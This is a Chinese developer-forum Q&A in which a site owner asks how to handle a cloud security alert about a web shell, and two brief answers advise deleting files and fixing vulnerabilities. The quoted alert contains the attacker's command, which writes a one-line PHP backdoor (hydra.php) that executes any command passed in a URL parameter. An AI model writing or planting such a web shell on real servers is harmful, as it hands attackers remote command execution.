开发者社区> 问答> 正文

被webshell攻击了

这些我已近配置了,现在看到如下内容:(怎么解决!!!)
待处理确认线下处理忽略本次标记为误报 
父进程名称:httpd 进程名称:bash 进程路径:/usr/bin/bash
进程id:18,146 命令行参数:sh -c echo ^<?php $action = $_GET['xcmd'];system($action);?^>>hydra.php
事件说明:云盾检测到当成有异常进程在尝试向磁盘上写入WEBSHELL后门文件,导致2次入侵,如果该行为不是您主动执行,请及时删除对应文件。 解决方案:请及时排查WWW目录下是否存在WEBSHELL,并及时清除。

展开
收起
1029342681332115 2018-12-21 14:50:10 1118 0
2 条回答
写回答
取消 提交回答
  • 喜欢智慧创造的过程
    网站被黑客攻击经常反复篡改上传webshell后门脚本木马,说明你的网站存在很多安全隐患,以及网站漏洞,就算登录服务器找到源文件修复了,也会被黑客再次入侵,只有把网站的所有漏洞找出来,一一进行修复,防止黑客的攻击,避免安全事故发生,如果您对网站漏洞修复不熟悉的话,建议找专业的网站安全公司帮您修复网站漏洞,国内也就Sinesafe和绿盟、启明星辰等安全公司比较专业.
    2018-12-27 08:51:17
    赞同 1 展开评论 打赏
  • 删除文件,修改系统,提高安全性
    2018-12-23 20:09:23
    赞同 展开评论 打赏
问答排行榜
最热
最新

相关电子书

更多
如何产生威胁情报-高级恶意攻击案例分析 立即下载
低代码开发师(初级)实战教程 立即下载
阿里巴巴DevOps 最佳实践手册 立即下载